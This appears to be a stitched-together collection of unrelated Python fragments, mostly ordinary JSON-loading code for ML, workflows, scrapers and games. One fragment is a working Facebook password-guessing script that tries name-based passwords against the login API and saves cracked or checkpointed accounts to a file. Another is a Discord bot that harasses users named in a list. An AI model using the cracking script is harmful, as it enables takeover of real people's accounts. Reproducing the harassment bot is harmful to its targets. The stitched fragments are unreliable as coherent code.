res['flipperc'] = flipperc res['train_mseloss'] = mseloss history.append(res) torch.save({'origpassport': origpassport, 'fakepassport': fakepassport, 'state_dict': model.state_dict()}, f'logs/passport_attack_3_epochs/{arch}-{scheme}-last-{dataset}-{rep}-{flipperc:.1f}-e0.pth') for ep in range(1, epochs + 1): if scheduler is not None: scheduler.step() print(f'Learning rate: {optimizer.param_groups[0]["lr"]}') print(f'Epoch {ep:3d}:') print('Training') trainres = train_maximize(origpassport, fakepassport, model, optimizer, criterion, trainloader, device, scheme) print('Testing') valres = test(model, criterion, valloader, device, scheme) res = {} for key in trainres: res[f'train_{key}'] = trainres[key] for key in valres: res[f'valid_{key}'] = valres[key] res['epoch'] = ep res['flipperc'] = flipperc with torch.no_grad(): cs = run_cs() res['cosine_similarity'] = cs print(f'Cosine Similarity of Real and Maximize passport: ' f'{sum(cs) / len(origpassport):.4f}') print() history.append(res) torch.save({'origpassport': origpassport, 'fakepassport': fakepassport, 'state_dict': model.state_dict()}, f'logs/passport_attack_3/{arch}-{scheme}-last-{dataset}-{rep}-{flipperc:.1f}-e{ep}.pth') histdf = pd.DataFrame(history) histdf.to_csv(f'logs/passport_attack_3/{arch}-{scheme}-history-{dataset}-{rep}-{flipperc:.1f}.csv')
def run_workflow( self, wdl_path: Path, inputs: Optional[dict] = None, expected: Optional[dict] = None, **kwargs ) -> dict: # TODO: handle "task_name" kwarg - run app instead of workflow wdl_doc = parse_wdl(wdl_path, self._import_dirs, **kwargs) if not wdl_doc.workflow: raise ValueError( "Currently, the dxWDL executor only supports executing " "workflows, not individual tasks" ) workflow_name = wdl_doc.workflow.name if ( "workflow_name" in kwargs and workflow_name != kwargs["workflow-name"] ): raise ValueError( f"The workflow name '{workflow_name}' does not match the value " f"of the 'workflow_name' parameter '{kwargs['workflow-name']}'" ) namespace = kwargs.get("stage_id", "stage-common") inputs_dict = None if "inputs_file" in kwargs: inputs_file = ensure_path(kwargs["inputs_file"]) if inputs_file.exists(): with open(inputs_file, "rt") as inp: inputs_dict = json.load(inp) if not inputs_dict: workflow_inputs = wdl_doc.workflow.available_inputs if workflow_inputs: dx_inputs_formatter = DxInputsFormatter(wdl_doc, **kwargs) inputs_dict = dx_inputs_formatter.format_inputs(inputs, namespace) else: inputs_dict = {} try: with login(): workflow = self._resolve_workflow(wdl_path, workflow_name, kwargs) analysis = workflow.run(inputs_dict) try: analysis.wait_on_done() outputs = self._get_analysis_outputs(analysis, expected.keys()) if expected: self._validate_outputs(outputs, expected, OUTPUT_STAGE) return outputs except dxpy.exceptions.DXJobFailureError: raise ExecutionFailedError( "dxWDL", workflow_name, analysis.describe()["state"], inputs_dict, **self._get_failed_task(analysis) ) finally: if self._cleanup_cache: shutil.rmtree(self._dxwdl_cache_dir) except dxpy.exceptions.InvalidAuthentication as ierr: raise ExecutorError("dxwdl", "Invalid DNAnexus credentials/token") from ierr except dxpy.exceptions.ResourceNotFound as rerr: raise ExecutorError("dxwdl", "Required resource was not found") from rerr except dxpy.exceptions.PermissionDenied as perr: raise ExecutorError( "dxwdl", f"You must have at least CONTRIBUTE permission" ) from perr
def load_from_json_file(filename): """ creates an Object from a JSON file """ with open(filename, 'r', encoding='utf8') as f: obj = json.load(f) return obj
sys.exit(1) if len(sys.argv) < 2: print_usage() url = sys.argv[1] if not url.startswith('https://vgmdb.net/album/'): print_usage() album_id = int(url[len('https://vgmdb.net/album/'):]) #TODO Using this json api seems to exclude certain scans. # In particular, it normally excludes all booklet pages, Obi, and Tray. # Consider scraping HTML instead to actually get every scan. jso_url = 'https://vgmdb.info/album/%d?format=json' % album_id req = urllib.request.urlopen(jso_url) jso = json.load(req) print(jso['name']) track_languages = set() tracks = [] max_track_digits = 2 disc_digits = math.ceil(math.log10(len(jso['discs']))) multi_disc = len(jso['discs']) > 1 for disc in jso['discs']: max_track_digits = max(max_track_digits, math.ceil(math.log10(len(disc['tracks'])))) for disc_idx, disc in enumerate(jso['discs']): disc_num = str(disc_idx + 1).zfill(disc_digits) disc_track_digits = max(2, math.ceil(math.log10(len(disc['tracks'])))) for track_idx, track in enumerate(disc['tracks']): track_num = str(track_idx + 1).zfill(disc_track_digits) track_languages |= track['names'].keys()
def get_json(url): try: return json.load(urllib2.urlopen(url)) except urllib2.HTTPError as e: print "Unable to fetch URL, exiting: %s" % url sys.exit(-1)
def loadSettings(self): exist = os.path.isfile("settings.json") if exist: with open("settings.json") as f: data = json.load(f) self.redPin = data["redPin"]
#by Lucas and Siddhant import json import csv from pprint import pprint with open('superheroes.json', 'r') as f: superheroes=json.load(f) # Creates an empty an array called power powers=[] # Loop thorough the members of the squad, # Append the powers of each to the powers array. members = superheroes ['members'] for hero in members: hero_powers= hero['powers'] powers.append(hero_powers) # Prints those powers to the terminal pprint(powers) with open('superheroes.csv', 'w') as f: writer = csv.writer(f) #writing the header writer.writerow(['name', 'age', 'secretIdentity', 'powers', 'squadName', 'homeTown', 'formed', 'secretBase', 'active']) members = superheroes ['members'] for hero in members: hero_name = hero['name'] hero_age = hero['age']
def GetLinkfromElement(text, driver): return WebDriverWait(driver, 10).until( EC.presence_of_element_located((By.LINK_TEXT, text)) ).get_attribute('href') def GetElementByXPATH(xpath, driver): return WebDriverWait(driver, 10).until( EC.presence_of_element_located((By.XPATH, xpath)) ) if __name__ == "__main__": # People to register try: registrants_json_file = "{}/registrants.json".format(dirname(abspath(__file__))) Registrants = json.load(open(registrants_json_file))['registrants'] except: print(''' Failed to load jummah_registrants.json file. Please make sure this the .json file exists to continue! ################################################################################# # FOLLOW THE EXAMPLE BELOW FOR PESONAL INFO FORMAT in the registrants.json file # (only update the value of the attributes: # { # "catagory": "men or women", # "timeslot": "timeslot", # "firstname": "firstname", # "lastname": "lastname", # "email": "email to get tickets", # "phone": "0000000000" # } #################################################################################
def main(arg): global cekpoint,oks user = arg try: os.mkdir('out') except OSError: pass try: a = requests.get('https://graph.facebook.com/'+user+'/?access_token='+toket) b = json.loads(a.text) pass1 = b['first_name'] + '786' data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="******"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6") q = json.load(data) if 'access_token' in q: print '\x1b[1;92m[OK] \x1b[1;92m ' + user + ' \x1b[1;92m | \x1b[1;92m ' + pass1 + ' 👽 ' + b['name'] oks.append(user+pass1) else: if 'www.facebook.com' in q["error_msg"]: print '\x1b[1;36;40m[CP] \x1b[1;97m ' + user + ' \x1b[1;36;40m|\x1b[1;97m ' + pass1 + ' 👽 ' + b['name'] cek = open("out/CP.txt", "a") cek.write(user+"|"+pass1+"\n") cek.close() cekpoint.append(user+pass1) else: pass2 = b['first_name'] + '123' data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="******"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6") q = json.load(data) if 'access_token' in q: print '\x1b[1;92m[OK] \x1b[1;92m ' + user + ' \x1b[1;92m | \x1b[1;92m ' + pass2 + ' 👽 ' + b['name'] oks.append(user+pass2) else: if 'www.facebook.com' in q["error_msg"]: print '\x1b[1;36;40m[CP] \x1b[1;97m ' + user + ' \x1b[1;36;40m|\x1b[1;97m ' + pass2 + ' 👽 ' + b['name'] cek = open("out/CP.txt", "a") cek.write(user+"|"+pass2+"\n") cek.close() cekpoint.append(user+pass2) else: pass3 = b['first_name'] + '12345' data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="******"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6") q = json.load(data) if 'access_token' in q: print '\x1b[1;92m[OK] \x1b[1;92m ' + user + ' \x1b[1;92m | \x1b[1;92m ' + pass3 + ' 👽 ' + b['name'] oks.append(user+pass3) else: if 'www.facebook.com' in q["error_msg"]: print '\x1b[1;36;40m[CP] \x1b[1;97m ' + user + ' \x1b[1;36;40m|\x1b[1;97m ' + pass3 + ' 👽 ' + b['name'] cek = open("out/CP.txt", "a") cek.write(user+"|"+pass3+"\n") cek.close() cekpoint.append(user+pass4) else: pass4 = b['first_name'] + '1234' data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="******"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6") q = json.load(data) if 'access_token' in q: print '\x1b[1;92m[OK] \x1b[1;92m ' + user + ' \x1b[1;92m | \x1b[1;92m ' + pass4 + ' 👽 ' + b['name'] oks.append(user+pass4) else: if 'www.facebook.com' in q["error_msg"]: print '\x1b[1;36;40m[CP] \x1b[1;97m ' + user + ' \x1b[1;36;40m|\x1b[1;97m ' + pass4 + ' 👽 ' + b['name'] cek = open("out/CP.txt", "a") cek.write(user+"|"+pass4+"\n") cek.close() cekpoint.append(user+pass4) else: pass5 = '786786' data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="******"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6") q = json.load(data) if 'access_token' in q: print '\x1b[1;92m[OK] \x1b[1;92m ' + user + ' \x1b[1;36;40m|\x1b[1;92m ' + pass5 + ' 👽 ' + b['name'] oks.append(user+pass5) else: if 'www.facebook.com' in q["error_msg"]: print '\x1b[1;36;40m[CP] \x1b[1;97m ' + user + ' \x1b[1;36;40m|\x1b[1;97m ' + pass5 + ' 👽 ' + b['name'] cek = open("out/CP.txt", "a") cek.write(user+"|"+pass5+"\n") cek.close() cekpoint.append(user+pass5) else: pass6 = b['last_name'] + '123' data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="******"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6") q = json.load(data) if 'access_token' in q: print '\x1b[1;92m[OK] \x1b[1;92m ' + user + ' \x1b[1;36;40m|\x1b[1;92m ' + pass6 + ' 👽 ' + b['name'] oks.append(user+pass6) else: if 'www.facebook.com' in q["error_msg"]: print '\x1b[1;36;40m[CP] \x1b[1;97m ' + user + ' \x1b[1;36;40m|\x1b[1;97m ' + pass6 + ' 👽 ' + b['name'] cek = open("out/CP.txt", "a") cek.write(user+"|"+pass6+"\n") cek.close() cekpoint.append(user+pass6) else: pass7 = 'Pakistan' data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="******"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6") q = json.load(data) if 'access_token' in q: print '\x1b[1;92m[OK] \x1b[1;92m ' + user + ' \x1b[1;36;40m|\x1b[1;92m ' + pass7 + ' 👽 ' + b['name'] oks.append(user+pass7) else: if 'www.facebook.com' in q["error_msg"]: print '\x1b[1;36;40m[CP] \x1b[1;97m ' + user + ' \x1b[1;36;40m|\x1b[1;97m ' + pass7 + ' 👽 ' + b['name'] cek = open("out/CP.txt", "a") cek.write(user+"|"+pass7+"\n") cek.close() cekpoint.append(user+pass7) except: pass
async def on_message(self, message): ''' Bad words filtering Checks if every word contained in the message is in the list of dirty words. If yes, then the bot delete the last message the sends a reminder as a response. ''' if message.author.bot: return mentionUser = message.author.mention responseList = [ f'{mentionUser} Please keep it clean bro', f'{mentionUser} Did your mom not raise you properly bro?', f'{mentionUser} I\'m calling the police on you bro' ] with open('txt/dirtywords.txt', 'r') as fp: dirtywords = fp.read().splitlines() for word in message.content.split(): if word.lower() in dirtywords: await message.delete() await message.channel.send(responseList[randint( 0, len(responseList) - 1)], delete_after=10) ''' Checks if user who wrote a message is in the "people to harass" list. If yes, the bot will respond with a harassment message ''' with open('txt/peopletoharass.txt', 'r') as fp: harassUserList = fp.read().splitlines() with open('txt/harassmentreponses.txt', 'r') as fp: harassmentResponses = fp.read().splitlines() if str(message.author) in harassUserList: try: randNum = randint(0, len(harassmentResponses) - 1) await message.channel.send( f'{message.author.mention} {harassmentResponses[randNum]}') if randNum == 6: sleep(5) await message.channel.send( f'{message.author.mention} Sike, b*tch') else: pass except IndexError: print( 'Harassment response empty. Fill in the "harassmentreponses.txt"' ) ''' Level up system adds experience points every time a user sends a message in the server and assign them a level when they reach a certain experience point threshold ''' try: with open('json/userxp.json') as fp: users = json.load(fp) users['users'][str(message.author.id)] += 1 with open('json/userxp.json', 'w') as fileToDump: json.dump(users, fileToDump, indent=4) authorXP = users['users'][str(message.author.id)] if authorXP == 10: role = discord.utils.get(message.guild.roles, id=638181731794681866) await message.author.add_roles(role) await message.channel.send( self.levelUpAnnouncement(message.author.mention, role.name)) elif authorXP == 30: role = discord.utils.get(message.guild.roles, id=638181995909873694) await message.author.add_roles(role) await message.channel.send( self.levelUpAnnouncement(message.author.mention, role.name)) elif authorXP == 90: role = discord.utils.get(message.guild.roles, id=638182182136840202) await message.author.add_roles(role) await message.channel.send( self.levelUpAnnouncement(message.author.mention, role.name)) elif authorXP == 270: role = discord.utils.get(message.guild.roles, id=638182260264403024) await message.author.add_roles(role) await message.channel.send( self.levelUpAnnouncement(message.author.mention, role.name)) elif authorXP == 810: role = discord.utils.get(message.guild.roles, id=638182302408769571) await message.author.add_roles(role) await message.channel.send( self.levelUpAnnouncement(message.author.mention, role.name)) except: pass ''' This block of code sends a motivational message to encourage you to get a girlfriend/boyfriend if the bot receives a Direct Message from anyone. ''' if message.channel.type == discord.ChannelType.private: DMresponses = [ 'Get a girlfriend bro (or boyfriend).', 'I have a boyfriend', 'I\'m already committed to someone. Find someone else.' ] await message.author.send(DMresponses[randint( 0, len(DMresponses) - 1)]) return else: pass ''' Logs all the messages sent. ''' log = f'{message.channel}: ({self.currentTime}) {message.author}: {message.content}' print(log) with open(f'logs/{self.currentDate}.txt', 'a') as fpAppend: fpAppend.write(f'{log}\n')
def load_directory(): # directory will be the first entry with open(TwitterBotProjectPath + '/config.json') as json_data_file: data = json.load(json_data_file) return data
def main(): usage = 'usage: %prog [options] <params_file> <model_file> <data_dir>' parser = OptionParser(usage) parser.add_option('-o', dest='out_dir', default='test_out', help='Output directory for test statistics [Default: %default]') parser.add_option('--rc', dest='rc', default=False, action='store_true', help='Average the fwd and rc predictions [Default: %default]') parser.add_option('--save', dest='save', default=False, action='store_true', help='Save targets and predictions numpy arrays [Default: %default]') parser.add_option('--shifts', dest='shifts', default='0', help='Ensemble prediction shifts [Default: %default]') parser.add_option('-t', dest='targets_file', default=None, type='str', help='File specifying target indexes and labels in table format') parser.add_option('--split', dest='split_label', default='test', help='Dataset split label for eg TFR pattern [Default: %default]') parser.add_option('--tfr', dest='tfr_pattern', default=None, help='TFR pattern string appended to data_dir/tfrecords for subsetting [Default: %default]') parser.add_option('-v', dest='high_var_pct', default=1.0, type='float', help='Highly variable site proportion to take [Default: %default]') (options, args) = parser.parse_args() if len(args) != 3: parser.error('Must provide parameters, model, and test data HDF5') else: params_file = args[0] model_file = args[1] data_dir = args[2] if not os.path.isdir(options.out_dir): os.mkdir(options.out_dir) # parse shifts to integers options.shifts = [int(shift) for shift in options.shifts.split(',')] ####################################################### # targets # read table if options.targets_file is None: options.targets_file = '%s/targets.txt' % data_dir targets_df = pd.read_csv(options.targets_file, index_col=0, sep='\t') num_targets = targets_df.shape[0] # classify target_classes = [] for ti in range(num_targets): description = targets_df.iloc[ti].description if description.find(':') == -1: tc = '*' else: desc_split = description.split(':') if desc_split[0] == 'CHIP': tc = '/'.join(desc_split[:2]) else: tc = desc_split[0] target_classes.append(tc) targets_df['class'] = target_classes target_classes = sorted(set(target_classes)) print(target_classes) ####################################################### # model # read parameters with open(params_file) as params_open: params = json.load(params_open) params_model = params['model'] params_train = params['train'] # construct eval data eval_data = dataset.SeqDataset(data_dir, split_label=options.split_label, batch_size=params_train['batch_size'], mode=tf.estimator.ModeKeys.EVAL, tfr_pattern=options.tfr_pattern) # initialize model seqnn_model = seqnn.SeqNN(params_model) seqnn_model.restore(model_file) seqnn_model.build_ensemble(options.rc, options.shifts) ####################################################### # targets/predictions # option to read from disk? # predict eval_preds = seqnn_model.predict(eval_data, verbose=1).astype('float16') print('') # targets eval_targets = eval_data.numpy(return_inputs=False, return_outputs=True) # flatten eval_preds = np.reshape(eval_preds, (-1,num_targets)) eval_targets = np.reshape(eval_targets, (-1,num_targets)) ####################################################### # process classes targets_spec = np.zeros(num_targets) for tc in target_classes: class_mask = np.array(targets_df['class'] == tc) num_targets_class = class_mask.sum() if num_targets_class == 1: targets_spec[class_mask] = np.nan else: # slice class eval_preds_class = eval_preds[:,class_mask].astype('float32') eval_targets_class = eval_targets[:,class_mask].astype('float32') # highly variable filter if options.high_var_pct < 1: eval_targets_var = eval_targets_class.var(axis=1) high_var_t = np.percentile(eval_targets_var, 100*(1-options.high_var_pct)) high_var_mask = (eval_targets_var >= high_var_t) eval_preds_class = eval_preds_class[high_var_mask] eval_targets_class = eval_targets_class[high_var_mask] # quantile normalize eval_preds_norm = quantile_normalize(eval_preds_class) eval_targets_norm = quantile_normalize(eval_targets_class) # mean normalize eval_preds_norm = eval_preds_norm - eval_preds_norm.mean(axis=-1, keepdims=True) eval_targets_norm = eval_targets_norm - eval_targets_norm.mean(axis=-1, keepdims=True) # compute correlations pearsonr_class = np.zeros(num_targets_class) for ti in range(num_targets_class): pearsonr_class[ti] = pearsonr(eval_preds_norm[:,ti], eval_targets_norm[:,ti])[0] # save targets_spec[class_mask] = pearsonr_class # print print('%-15s %4d %.4f' % (tc, num_targets_class, pearsonr_class[ti])) # write target-level statistics targets_acc_df = pd.DataFrame({ 'index': targets_df.index, 'pearsonr': targets_spec, 'identifier': targets_df.identifier, 'description': targets_df.description }) targets_acc_df.to_csv('%s/acc.txt'%options.out_dir, sep='\t', index=False, float_format='%.5f')
# This module tests to see APIs that relates to users works correctly or not # NOTE: This test should not be used in production server # (Due to generating random user in DB) # TODO: Make test to be usable in production server import json import random import string # Load config file with open('config.json', mode='r') as config_file: CONFIG = json.load(config_file) HEADERS = { 'Content-Type': 'application/json' } # Routes USER_SIGNUP_ROUTE = CONFIG.get('routes', {}).get('user', {}).get('signup') USER_LOGIN_ROUTE = CONFIG.get('routes', {}).get('user', {}).get('login') USER_PUBLICITY_ROUTE = CONFIG.get('routes', {}).get('user', {}).get( 'publicity') USER_ACTIVITY_ROUTE = CONFIG.get('routes', {}).get('user', {}).get( 'activity_list') LINKS_MAIN_ROUTE = CONFIG.get('routes', {}).get('links', {}).get('main') CATEGORIES_MAIN_ROUTE = CONFIG.get( 'routes', {}).get('categories', {}).get('main') LINKS_BY_CATEGORY_ROUTE = CONFIG.get( 'routes', {}).get('links', {}).get('by_category') LINKS_BY_SEARCH_ROUTE = CONFIG.get( 'routes', {}).get('links', {}).get('by_pattern') LINKS_UPDATE_CATEGORY = CONFIG.get( 'routes', {}).get('links', {}).get('update_category') LINKS_BY_USER_ID = CONFIG.get(
# Find the value in the sorted overlaps which divides the indexes # to overlap values less or greater than the value tidx = bisect.bisect(self._odata[idx][sort_idx], thresh) return self._odata[idx][sort_idx][-tidx:] #return self._odata[idx][sort_idx][-npts:] return sort_idx[-npts:] def intr_prms_from_idx(self, idx): return self._intr_info[idx] tree = OverlapLookup(5762) # If asked, retrieve bank overlap if opts.use_overlap is not None: with open(opts.use_overlap) as fin: overlap_toc = json.load(fin)["types"] # Just get the first type... overlap_toc = overlap_toc[overlap_toc.keys()[0]] # FIXME: bpath = os.path.dirname(opts.use_overlap) overlap = {} for idx, info in enumerate(overlap_toc): print os.path.join(bpath, info["filename"]) with open(os.path.join(bpath, info["filename"])) as ovrlpfile: contents = json.load(ovrlpfile) overlap[idx] = numpy.array(contents["overlap"]) tree.add_overlap_row(idx, (info["mass1"], info["mass2"]), numpy.array(contents["overlap"])) tree.query(0, 1) # TODO: Map an input point onto the template bank intrinsic space
tkey = {i0:0, i1:0, i2:0, i3:0, i4:0, i5:0, i6:0, i7:0, i8:0, i9:0, a:0, b:0, c:0, d:0, e:0, f:0, g:0, h:0, i:0, j:0, k:0, l:0, m:0, n:0, o:0, p:0, q:0, r:0, s:0, t:0, u:0, v:0, w:0, x:0, y:0, z:0, bk:0, sp:0, tb:0, esc:0, sh:0, enter:0, bq:0, min:0, plus:0, lbra:0, rbra:0, bckslsh:0, semi:0, quote:0, comma:0, period:0, slash:0, F11:0} tkey_v = {i0:0, i1:0, i2:0, i3:0, i4:0, i5:0, i6:0, i7:0, i8:0, i9:0, a:0, b:0, c:0, d:0, e:0, f:0, g:0, h:0, i:0, j:0, k:0, l:0, m:0, n:0, o:0, p:0, q:0, r:0, s:0, t:0, u:0, v:0, w:0, x:0, y:0, z:0, bk:0, sp:0, tb:0, esc:0, sh:0, enter:0, bq:0, min:0, plus:0, lbra:0, rbra:0, bckslsh:0, semi:0, quote:0, comma:0, period:0, slash:0, F11:0} nkey = {i0:0, i1:0, i2:0, i3:0, i4:0, i5:0, i6:0, i7:0, i8:0, i9:0, a:0, b:0, c:0, d:0, e:0, f:0, g:0, h:0, i:0, j:0, k:0, l:0, m:0, n:0, o:0, p:0, q:0, r:0, s:0, t:0, u:0, v:0, w:0, x:0, y:0, z:0, bk:0, sp:0, tb:0, esc:0, sh:0, enter:0, bq:0, min:0, plus:0, lbra:0, rbra:0, bckslsh:0, semi:0, quote:0, comma:0, period:0, slash:0, F11:0} from Structure.Disarray_Classes import * from Structure.Disarray_Modes import * Unsorted_Images = [] for this in os.listdir(): if this[-4:] == ".jpg" or this[-4:] == ".png": Unsorted_Images.append(this) importables = {} for this in importables: with open('Data/' + this + '.json', 'r') as file: importables[this].update(json.load(file)) mode_func_dict = {'Quit': Quit_func, 'Add_New': Add_New_func, 'Menu': pass_func2} Toolbar_Assets_dict = {'Toolbar.png':[0, 0, 10], 'Question_Block.png':[15, 0, 10.1]} Toolbar_Assets = [] for this in os.listdir('Toolbar/Toolbar_Assets/'): Toolbar_Asset = Image(this, 'Toolbar/Toolbar_Assets/', Toolbar_Assets_dict[this][0], Toolbar_Assets_dict[this][1]); Toolbar_Asset.Layer = Toolbar_Assets_dict[this][2] Toolbar_Assets.append(Toolbar_Asset) Bgr = 0; Bgg = 0; Bgb = 0; mouse_visible = 1; mode = "Menu"; toolbar_show = 1; help_show = 1; New_Image = Image(None, '', 0, 0); Images = []; screenlist = [(0, 0), pg.FULLSCREEN]; screenlist_v = [(screen.get_width(), screen.get_height()), pg.RESIZABLE] running = 1 while running: if not screenlist == screenlist_v: screen = pg.display.set_mode(*screenlist) screenlist_v = screenlist mouse_x, mouse_y = pg.mouse.get_pos()
def compile(clazz, hv_ir_path, static_dir, output_dir, externs, copyright=None): """ Compiles a HeavyIR file into a C. Returns a tuple of compile time in seconds, a notification dictionary, and a HeavyIR object counter. """ # keep track of the total compile time tick = time.time() # establish the jinja environment env = jinja2.Environment() env.filters["hvhash"] = ir2c.filter_hvhash env.filters["extern"] = ir2c.filter_extern env.loader = jinja2.FileSystemLoader( os.path.join(os.path.dirname(__file__), "templates")) # read the hv.ir.json file with open(hv_ir_path, "r") as f: ir = json.load(f) # generate the copyright copyright = copyright_manager.get_copyright_for_c(copyright) # # Parse the hv.ir data structure and generate C-language strings. # # generate set of header files to include include_set = set([x for o in ir["objects"].values() for x in ir2c.get_class(o["type"]).get_C_header_set()]) # generate set of files to add to project file_set = set([x for o in ir["objects"].values() for x in ir2c.get_class(o["type"]).get_C_file_set()]) file_set.update(ir2c.__BASE_FILE_SET) # generate object definition and initialisation list init_list = [] free_list = [] def_list = [] decl_list = [] for obj_id in ir["init"]["order"]: o = ir["objects"][obj_id] obj_class = ir2c.get_class(o["type"]) init_list.extend(obj_class.get_C_init(o["type"], obj_id, o["args"])) def_list.extend(obj_class.get_C_def(o["type"], obj_id)) free_list.extend(obj_class.get_C_free(o["type"], obj_id, o["args"])) impl_list = [] for x in ir["control"]["sendMessage"]: obj_id = x["id"] o = ir["objects"][obj_id] obj_class = ir2c.get_class(o["type"]) impl = obj_class.get_C_impl( o["type"], obj_id, x["onMessage"], ir2c.get_class, ir["objects"]) impl_list.append("\n".join(PrettyfyC.prettyfy_list(impl))) decl_list.extend(obj_class.get_C_decl(o["type"], obj_id, o["args"])) # generate static table data initialisers table_data_list = [] for k, v in ir["tables"].items(): o = ir["objects"][v["id"]] obj_class = ir2c.get_class(o["type"]) table_data_list.extend(obj_class.get_table_data_decl( o["type"], v["id"], o["args"])) # generate the list of functions to process process_list = [] for x in ir["signal"]["processOrder"]: obj_id = x["id"] o = ir["objects"][obj_id] process_list.extend(ir2c.get_class(o["type"]).get_C_process( o["type"], x, ir["objects"][obj_id]["args"])) # # Load the C-language template files and use the parsed strings to fill them in. # # make the output directory if necessary if not os.path.exists(output_dir): os.makedirs(output_dir) # the project name to be used as a part of file and function names name = ir["name"]["escaped"] # ensure that send_receive dictionary is alphabetised by the receiver key send_receive = OrderedDict(sorted([(k,v) for k,v in ir["control"]["receivers"].items()], key=lambda x: x[0])) # write HeavyContext.h with open(os.path.join(output_dir, "Heavy_{0}.hpp".format(name)), "w") as f: f.write(env.get_template("Heavy_NAME.hpp").render( name=name, include_set=include_set, decl_list=decl_list, def_list=def_list, signal=ir["signal"], copyright=copyright, externs=externs)) # write C++ implementation with open(os.path.join(output_dir, "Heavy_{0}.cpp".format(name)), "w") as f: f.write(env.get_template("Heavy_NAME.cpp").render( name=name, signal=ir["signal"], init_list=init_list, free_list=free_list, impl_list=impl_list, send_receive=send_receive, send_table=ir["tables"], process_list=process_list, table_data_list=table_data_list, copyright=copyright)) # write C API, hv_NAME.h with open(os.path.join(output_dir, "Heavy_{0}.h".format(name)), "w") as f: f.write(env.get_template("Heavy_NAME.h").render( name=name, copyright=copyright, externs=externs)) # copy static files to output directory for f in file_set: shutil.copy2( src=os.path.join(static_dir, f), dst=os.path.join(output_dir, f)) # generate HeavyIR object counter ir_counter = Counter([obj["type"] for obj in ir["objects"].values()]) return { "stage": "ir2c", "notifs": { "has_error": False, "exception": None, "errors": [] }, "in_dir": os.path.dirname(hv_ir_path), "in_file": os.path.basename(hv_ir_path), "out_dir": output_dir, "out_file": "", "compile_time": (time.time() - tick), "obj_counter": ir_counter }
def get(self): path = os.path.join(server_path, "analytics.json") fp = open(path, "r") analytics = json.load(fp) fp.close() return analytics
def main(): with open('animal.json') as f: data = json.load(f) #print(data) # animalList=['Tiger','Monkey','Bat','Donkey','Bear'] name = random.choice(data) count = 8 print('###############################################') print(' WELCOME TO HANGMAN ') print('###############################################') print('\n\n\n') print('Category : Animals') l = {} for i in name: l[i] = 0 attempt = [] char = ' ' flag = False status = False for i in l: if (l[i] == 0): print('-', end='') print('') print('Enter character of animal') while (count > 0 and status == False): flag = False print('\nEnter character :', end='') char = str(input()) for i in l: if (i.lower() == char.lower() and l[i] != 1): l[i] = 1 flag = True if (flag == False): attempt.append(char) count = count - 1 for i in l: if (l[i] == 0): print('-', end='') else: print(i, end='') print('\nMissed :') for i in attempt: print(i, ' ', end='') print() print('Chances remaining :', count) status = True for i in l: if (l[i] == 0): status = False hangman(count) if (status == True): print('You won!!!!!!!!!!!!!!!!') else: print('You ran out of chances !!\nAnimal was :') for i in l: print(i, end='') print()
def read_json(path): with open(path, 'r') as file: data = json.load(file) return data
column_name = column_name[column_name. find(str(previous_key)) + len(str(previous_key)) + 1:] print(column_name) master_list.append(str(column_name)) column_name = column_name[:column_name.rfind(str(index)) - 1] # print( "Count: {}, Previous Key: {}".format( count, previous_key ) ) # return list_or_dict[index] print("Value found") # time.sleep(0.7) with open("./resources/Reports/report.json", 'r') as json_report_file: json_report_dict = json.load(json_report_file) # # print( json.dumps(json_report_dict["info"], indent=4) ) # json_report_dict_normalize = json_normalize( json_report_dict ) # for column in json_report_dict_normalize.columns: # print("\nName of Colums: ", column) # print( json_report_dict_normalize ) # for key in json_report_dict.keys(): nested_element = dict_or_list2(json_report_dict, json_report_dict, previous_key="") # print(nested_element) # print(nested_element, end = '')
def collect_ips(file_name): output_json = json.load(open(file_name)) for entry in output_json: print_header(entry['title']) external_hostnames_key = 'external_hostnames' if entry.has_key(external_hostnames_key): external_hostnames = entry[external_hostnames_key] for hostname in external_hostnames: print_line_item(hostname, get_ip_for_hostname(hostname)) ec2_instance_name_tags_key = 'ec2_instance_name_tags' if entry.has_key(ec2_instance_name_tags_key): ec2_name_tags = entry[ec2_instance_name_tags_key] for pair in ec2_name_tags: display_name = pair['display_name'] aws_tag_name = pair['aws_tag_name'] ip = get_instance_ip_by_name_tag(aws_tag_name) print_line_item(display_name, ip) ec2_elb_name_tags_key = 'ec2_elb_name_tags' if entry.has_key(ec2_elb_name_tags_key): ec2_elb_name_tags = entry[ec2_elb_name_tags_key] for pair in ec2_elb_name_tags: display_name = pair['display_name'] elb_name = pair['elb_name'] ip = get_elb_ip_by_elb_name(elb_name) print_line_item(display_name, ip) elasticache_clusters_key = 'elasticache_clusters' if entry.has_key(elasticache_clusters_key): elasticache_clusters = entry[elasticache_clusters_key] for cluster in elasticache_clusters: display_name = cluster['display_name'] cluster_id = cluster['cluster_id'] print_line_item(display_name, 